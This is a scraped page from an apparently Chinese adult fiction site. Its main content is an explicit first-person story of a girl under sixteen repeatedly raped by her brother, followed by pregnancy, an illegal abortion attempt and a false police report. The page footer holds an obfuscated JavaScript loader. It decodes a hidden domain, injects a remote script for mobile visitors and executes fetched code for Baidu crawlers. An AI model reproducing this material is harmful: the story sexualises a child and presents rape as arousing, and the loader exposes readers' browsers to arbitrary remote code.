返回

梦3cd

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



我是一名少女,跟哥哥和父母同住,本来生活还算幸福美满。
但半年前,我哥哥大学毕业后一直找不到工作,还弄到神经紧张,有时更会夜半梦游。
最初听到『梦游』这名词时,真的有点害怕,因为在电视电影里经常看到梦游拿着刀子杀人的情节,但经过医生的解释后,我们才知道实情并非如戏剧里那样夸张。
详细情形,我也不甚理解,总之我哥哥的病情尚属轻微,应该不会做出伤人的事来。最重要的是,碰到他梦游时,不要拍醒他,他梦游完后,便自然会回到睡眠状态,而当他睡醒后,也不会记得梦游时做过什么事来。
可是他梦游时,自己也不知道自己在做什么,所以最终还是出事了。
事情是这样的︰
大约五个月前的一个深夜,我在睡梦中感到尿意,便下床上洗手间。因为太急和太困了,一进入洗手间,我连门也忘记上锁,只是把门关上,便匆匆忙忙脱去下裳,一屁股坐在马桶上把尿放出来。
刚尿完,厕所门忽然给打开,我抬头一看,原来是哥哥。
(哇°°)
我差点就喊了出来,但及时用手把口摀住,因为我看到哥哥的眼睛紧闭着,我知道他正在梦游,为怕惊醒他,所以不敢发出声音来。
他一进来,便来到马桶前,这时我才想到他也是进来尿尿的。
我想站起来迴避也来不及了,他站的位置太贴近马桶,现在站起来,一定会碰到他,我只好继续坐着,静观其变。
当然,当时也没有空间给我穿回裤子,只好听任下体继续暴露着,还好哥哥的眼睛一直在闭着,什么也看不到,否则便尴尬死了。
第一次看男人小便,居然是面对面的看着。原来男人小便跟女人一样,都是要张开两腿的。而他把腿张开时,我也得把腿张得更开,以免我们四条腿碰在一起。
这个大腿张开的姿势,令我阴道口的两片肉瓣也给掰开,我隐约感到阴道里有阵阵凉意。虽然没其他人看到,不过在自己亲生哥哥面前摆出如此不堪入目的姿势,还是会让我觉得面红耳热。
跟着,不用说,哥哥当然是拉下裤头,把阳具掏出来放尿。
我见他有所动作时,又是给吓了一跳,连忙用手掩面,不敢去看。我只希望他的尿柱射正水坑,不要把尿溅到我身上。(因为平时他跟爸爸小便后,马桶边缘和旁边地下都沾满黄黄的尿迹,可能男人尿完都会把地方弄成这样吧。)
我巴不得哥哥快点尿完离去。可是等了一会,仍然全无动静,没有我所期待的水声。我忍不住从指缝偷看,不得了,只见哥哥用手不停地把阳具套弄,原来他在打炮!他居然在亲生妹妹面前打炮!
虽说他正在梦游,自己也不知道自己在干啥,不过我还是有点恼怒。
(好,你要打炮给我看,我就看看你们男人是的怎么打炮的,也看看你的老二有啥了不起。)
在捣气和好奇的心态下,我乾脆把掩着面的手放下,堂而煌之地看着哥哥打炮。
哥哥的那话儿很长,他的一个手掌也不能把它完全的握住,猪肝色的龟头在虎口处伸了出来,细看之下,胀卜卜的龟头尖端有一个像嘴唇的东东,中间有个小孔,那大概就是男人放尿的地方吧。
我又用手掌和手指给比一比,哥哥的那话儿差不多有五寸长、一寸粗,龟头部分更加有寸半粗。回想到自己的狭小阴道,如果我将来的老公的那话儿也是这样又粗又长的话,那我不给插死才怪!
正想得出神,冷不防哥哥高潮到来,白色的精液从龟头尖端喷射而出,直射到我面上,我想掩面已来不及,然后他还继续做着套弄的动作,精液源源射出,我感到私处一暖,原来他把精液也射到我的下体。
惨!我两腿大大的张开,私处无遮无掩,结果给射个正着。
我连忙伸手去拿厕纸,好死不死,哥哥射完精后,也伸手去拿厕纸,结果我们的手碰在一起,我想缩手已来不及。他抓住我的手腕,把我的手拉到他的下身前。
我抬头看看,见哥哥还未醒过来,所以也不敢跟他角力,只好把手放软。
原来哥哥把我的手当做厕纸,他把我的手背和掌心来回的拭擦着他的老二。
虽然已经软了下来,但哥哥的那话儿少说也还有四寸长,而且我的手还感觉到它的温热。
抹了一会,他终于放下我的手,拉拉抽水掣,然后便穿回裤子离去。
虽然身上好几处地方都沾上了哥哥的秽液,不过我早给吓得魂不附体,哪敢还在厕所多作逗留?于是我也匆匆穿回裤子离去,回到睡房才小心地抹去身上的秽液。
当我要抹下身时,才发现先前在慌忙间忘了穿回内裤,只穿了睡裤便跑回睡房。于是我把全身抹乾净后,便回到厕所,想把内裤取回。
来到厕所门口,见木门虚掩,灯还亮着,我正在想︰一定是我刚才忘记关灯了。一边想,一边顺手把门推开,不料哥哥原来在里头,还把我的内裤放在鼻子旁嗅着。
我以为他又再梦游,但他转过头来,我见他双眼打开着,眼中还闪出妖异的光芒……分明就是已经醒过来。
我们四眼交投。我想把内裤取回,又怕会造成更大的尴尬。我想,不如就当做什么也没发生过。
我想转身离开,但刚转过身,哥哥却从后把我拦腰抱着,其中一只手掌从我睡衣下摆伸进去,隔着乳罩搓捏我的乳房。
『哥……你想要干什么……』我觉得不对头,但为免吵醒爸爸妈妈,我还是尽量把嗓子压低。
『没什么……刚才不小心弄髒了你的下身,所以想帮你清洁一下,不然你会怀孕的……』他一边说,一边把另一只从我裤头伸进去,用手中那被搓成一团的内裤,摩擦着我的私处。
不是说,梦游的人在醒来后,会记不起梦游时所做过的事情来吗?为什么哥哥会知道他曾经把他的东西射到我的下体来?
但我已没空去细想这个问题了,因为哥哥正在用我那柔软的丝质内裤轻揉着我的阴道口,把我弄得趐趐痒痒的,而我的乳尖,也给他另一只手挑逗得发硬起来了。
不过我的理性也给他刚才的说话唤醒°°对了,这几天是危险期,如果不彻底把私处的精液清洗,那搞不好还是会有怀孕的机会。
已管不了哥哥对我的轻薄,我只想从他的缠扰挣脱开来,冲进厕所洗澡,但没有成功。我只好口头上警告他,如果他再不放手,我便要大声叫喊了。
哥哥听罢,把手从我睡裤里抽出来,我以为他是要放过我了,殊不知他是要把手中的内裤塞进我口里,使我叫不出声来,我的两只手腕,也随即给他的手紧紧的抓在一起,无法动弹,想把口里的内裤拿出来也不行。
然后哥哥把我从厕所门口拖出大厅,还朝着他睡房的方向前进。
我知道事情不是闹着玩的。我更加努力地挣扎,但我越挣扎,哥哥却越把我箍得紧,在我的屁股贴着他的下身时,我还可以感觉到他的下体又再硬起来,不禁大吃一惊。
想不到才刚发洩过、几分钟前还软绵绵的男性器官,现在又在昂首勃起,而我也终于给推倒在他的床上,这样我不是危险极了么?
哥哥还把我按在床上,他继续用一只手紧扣着我的双腕,另一只手则转到我下身来,抓住我的裤头,想把我的睡裤扯下来。我双脚乱踢,虽然成功阻止他把我的裤子褪下,但在混乱中,裤子却给撕烂了,我登时感到大腿一阵凉意。
哥哥乘机从我的裤子撕下一条布条,把我双腕缚在床头的一条木柱上,这样他便有两只手来对付我的下身了。
想到那勃起时长五寸、粗一寸的男性器官时,我更加的着急,急得连眼泪也流了出来,我在心里哀求哥哥放过我,但他不为所动,反而把我的睡裤脱下,还把我的双腿张开。我猛地摇头,但最终哥哥还是把他的阳具插进了我的下体。
『妹头,刚才你的小手把我的老二弄得很难受,所以你定要帮我解决一下,不过我会慢慢来的,一定不会把你弄痛……』
虽然哥哥的插入动作很缓慢,但因为他那话儿°°尤其是他的龟头°°实在太粗大了,我仍然感到下身传来阵阵的撕裂痛楚。而在他进行抽送的动作时,我更是痛得差点便昏了过去。
不知过了多久,哥哥再一次到达了高潮,不过今次他的阳具却在我阴道里射精,迫我全数接收了他的精子。
为了让自己接受这个令人无法接受的残酷事实,我安慰自己说︰哥哥一定是一时冲动,控制不了自己,才对我做出这种无耻的事来。
我见他发洩过后,爬起身来,他的上身来到我的胸前,我以为他是要解开缚着我的绳子。谁知他原来还未满足,他解开我睡衣胸前的钮扣、拉高我的奶罩,用手把玩我的乳房,又用嘴吻我的粉颈和脸颊。
虽然大腿尽头痛得发麻,但哥哥对我上身的侵犯,却令我感到阵阵的快感。如果这个抚慰我身躯的人,是我心爱的男人,那该是多么美好的事情。可惜实际上,这个男人却是一名禽兽不如的兄长。他的抚摸与热吻,不是源于男女之间的纯真爱情,而是为了满足他个人的兽慾。
令我感到羞耻的是,我的肉体竟然对这种既贪婪又淫邪的挑逗产生了不自愿的兴奋,我恨思春期少女的身体,居然是如斯不堪一击。
满足了手足之欲后,哥哥的下体又回过气来,把我再一次蹂躏。这一次,他没有刚才那么温柔了,他狠狠的把阳具插进我体内,也狠狠的把阳具在我体内抽插,本来已经发痛的地方,给他阳具无情的摩擦,更让我最终痛得昏了过去。
当甦醒过来时,我早已给抱回到我的床上。我感觉到下体疼痛得要死,虽然灌满阴道的精液正倒流出来,把大腿尽头弄得又冷又湿,但我也不得不休息好一会,才勉强能够下床到厕所洗澡。
我狠狠的洗擦着全身,尤其是下体,我狠狠的用海棉把下体擦乾净,又不顾痛楚,把红肿了的阴唇大大的掰开,好让强劲的花洒水柱把体内的男人秽液冲出来。
当然,我也哭了一场,还想过要怎样面对这件不幸的事情。要告诉父母吗?要报警吗?人家会不会相信我呢?他们会怎么看待我呢?会不会跟我说些难堪的说话呢?
『你这个女生真不要脸,要搞也跑远些去搞嘛,居然在家跟亲生哥哥搞在一起,真冤孽罗!』
『你说你哥哥强姦你,那么详细情形是怎样的呢?他的阴茎进入了多少?你觉得痛吗?有在你阴道里射精没?他的阴茎在你体内抽送的时候,你有快感吗?在这以前,你还是处女吗?你有没有跟其他男生发生过性关係呢……』
『跟据你哥哥的供词,你当时没把内裤穿在身上,还把内裤放在厕所的衣架上来引诱他……』
忘记过去比面对将来要来得容易,那不如就当做没事发生过,当发了一场噩梦便算了吧。
谁知这种息事宁人的做法却做成更严重的后果。
过了几天,哥哥以为我怕事,竟然食髓知味,趁父母外出时,想再一次把我强姦︰
那天一早,我父母要上早班,一早便离开了家门。稍后我也下床上学。当我换好校服,连袜子也穿上了,正要準备穿鞋子时,哥哥忽然从睡房出来。他一把拉着我的胳臂,想把我拖进他的睡房。
我知道他想做什么,我觉得他不可以再对我做出那种事来,我想拒绝,但又没有勇气,结果我只是软弱地用了一个窝囊的理由来哀求︰『哥……不要……我……今天要上学……我会迟到的……』
『那不要进房了,我就在地上跟你打一炮吧!不过你也得合作点,不要跟我拉拉扯扯,否则扯烂了你的校服,你连学也上不了。』
我不知道应该如何反抗,或者应该说,我甚至不知道我是否应该反抗,结果在半推半就的情况下,我给推倒在大厅地上。哥哥揭起我的校服裙和底裙,又把我的内裤脱下,跟着再一次把我强姦了。
他的动作又急又粗暴,虽然这已经不是第一次,却还是给弄得死去活来。我其实早已痛得泪如泉涌,但我被迫咬紧下唇,不敢哼出一声来,因为大门半开,门外的走廊不时有人经过,我害怕会惊动邻居,让他们知道我家发生了这种不伦的丑事。
哥哥抽送了十多分钟方才到达高潮,他又像上次一样,在我体内射精,但这一次我可没空去清洗身体。匆匆穿回内裤后,我便穿上鞋子飞跑出屋。
上学的人潮已退去,我一面跑回学校,一面抹去泪水,但其实我的大腿尽头还隐隐作痛,跑也跑不快,还好学校就在我家楼下不远处,结果我只是迟到了十分钟,虽然给记了缺点,却没给同学和老师发现我有任何异样。
不过整个早上,我都没法集中精神上课,因为精液从体内倒流出来,把内裤前面的部分都弄湿了。一滩又粘又凉的液体浸着我的私处,令人浑身不自在,后来我还隐约感觉到我下身传来阵阵精液的腥臭味道……
自那一天开始,每次只有我们两兄妹在家里时,他都在我身上饱尝兽慾,有时在他的床上做、有时在我的床上做、有时在大厅的沙发床上做……每一次,我都哀求他不要再对我做这种事情,但他却无耻地说,一件秽,两件也是秽,我既然已经给他上了,就算再给他上一次也没关係。他还劝我说,不如乘机享受一下男女性交的欢愉。
虽然肉体上确实有点兴奋的反应,可是这种如同被强姦的遭遇,真的可以让我去享受吗?
终于在上星期,我觉得身体有点异样,尤其是我的月事已经有好几个月没来了,心头忽然有种不祥的感觉。
我去医生处检查,最不幸的事情真的发生在我身上︰我怀了哥哥的骨肉。
我把这件事告诉我哥哥,他也不知所措,说要好好的想一晚。我以为他会在第二天给我一个解决方法,怎知他却玩失蹤,丢下我一个人去面对这件事。
虽然很慌惶,但我依然未敢把此事告知父母。后来,大约一个礼拜后,我打听到一家做黑市堕胎的诊所,我拿着积蓄了多年的私己钱去做手术,谁知那家诊所原来早给警方盯上了。
那天我刚踏进诊所,警察便跟着冲进来,一干人等,包括我自己和其他好几个在等候做手术的孕妇,都给带回警署『协助调查』。
轮到我给问话时,我骗他们说我只是去看普通的病,我以为我这样年轻,他们一定不会怀疑我是去堕胎的,谁知他们一看到我那微微隆起的肚皮时,便知道我已经怀孕了。
原来那些警察见过不少像我这种年纪的少女去堕胎,她们都是因为乱搞男女关係,而被搞大了肚子。他们最初也以为我跟那些少女一样,本来是见怪不怪,只因为我还未够十六岁,所以警方要查究我肚里孩子的经手人。
虽然怀孕的事已无法再隐瞒下去,不过我还是尽力避免让哥哥给抓去坐牢,于是便编了这样的一个故事︰大约五个月前的一个黄昏,我放学乘电梯回家,不料在电梯里遇上了色魔,他用刀架在我的颈上,把我胁持到楼梯转角,然后还把我强姦了,但我因为怕事和害羞,不单没有报警,也没有把这件事告诉别人,想不到竟然因此而怀了色魔的孽种……
他们听到我的故事后,觉得事情非同小可,连忙派人到现场调查。
莫说强姦案是编出来的,就算是真有其事,都已经隔了几个月,还可以查出什么来?不过最重要的,就是医院给我做堕胎手术,这当然要比黑市手术安全多了。
我父母本来已经因为哥哥的失蹤而忧心不已,现在听到说我给色魔玷污了,更因此而怀孕,对他们来说,当然又是一项打击。
如果让他们知道搞大我肚子的人原来就是他们的宝贝儿子,我猜他们一定会给刺激得发疯。
把胎儿拿掉后,我还要在医院住好几天,然后才可以回家。
我以为从此以后,一切都过去,我可以重过正常生活了。怎知我还得要忍受不少闲言闲语,这都怪我自己大意,编故事没想清楚。
原来警方在查我所编出来的案时,在我所住的大厦进行了地毡式搜索,这样当然惊动了我的左邻右里。虽说警方会把受害人的身份保密,但不知怎的,这案件的受害人身份还是给洩漏了出去。
早知如此,我便随便指个山头给警方去调查,那我便可以耳根清净一点了。
『喂,听说你十三楼的张太的囟囟在几个月前遇到了色魔,而且还给强姦了呢!』
『对喔,就是住在我家对面的乖乖女,样子蛮清秀的,为人又有礼貌,出入碰到面都有跟我们打招呼,可惜才十几岁就给色魔蹋了,你说她将来怎嫁出去喔……』
『那些无良色狼就是专吃这种乖巧的小女生,正所谓十几岁,卜卜脆嘛,我看你家里的几个小ㄚ头都得小心一点。』
『上星期都没见过她,听说是在医院住了好几天,不知是何原因耶?』
『该不会是给色魔传洩了性病吧?听说有些色魔因为洩了性病,连妓女都不肯做他们生意,所以才找良家妇女来发洩性慾……』
『并不是性病,她是因姦成孕呢!上两个星期,我已经留意到她的腰围变粗了,肚子也胖胖的,当时我已经觉得奇怪,怎么会突然间会肥得这么厉害……原来是给色魔搞大了肚子……』
『世间那会有这么夭寿的事情ㄚ,不会是真的吧?我昨天看到她,看来身材都很窈窕耶。』
『就是因为上星期在医院住了好几天,把胎儿拿掉了,才回复以前的身材,不过肚皮就一定会鬆了点,这是免不了的……』
『嗯,你倒有不少的经验。』
『呸呸呸,你快吐口水重新说过,人家哪里有给色魔搞大过肚子,我可是玉洁冰清的……』
『你不用这么紧张,我是说你有不少的怀孕经验。』
『说话要清楚点嘛,女儿都生了三个,我没有经验谁有?不过堕胎经验我就真的没有了。喂,她这么年轻便堕胎,不知将来是否可以生孩子呢?』
『或者可以吧,不过有没有男人肯要她,还很难说呢!』
……
已经不止一次听到邻居在我背后说三道四了,每次我都心想︰最夭寿的还不是你们这几个三八,看看你们家里的女孩什么时候也给色魔姦了,到时看你们还有没有心情去八卦人家的私事。


评分
相关推荐
3.0分

3.0分 如梦的梦琪e75

3.0分

3.0分 如梦的梦琪e75

3.0分

3.0分 幻梦之梦一6a9

3.0分

3.0分 蝶梦91b

3.0分

3.0分 蝶梦91b

3.0分

3.0分 梦游74f

3.0分

3.0分 蝶梦91b

3.0分

3.0分 春梦355

3.0分

3.0分 绮梦935

3.0分

3.0分 淫梦?648

3.0分

3.0分 春梦355

3.0分

3.0分 梦海7b4

3.0分

3.0分 《梦魇》e23

3.0分

3.0分 《梦魇》e23

3.0分

3.0分 梦游74f

3.0分

3.0分 婬娃梦梦成长全记录403


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};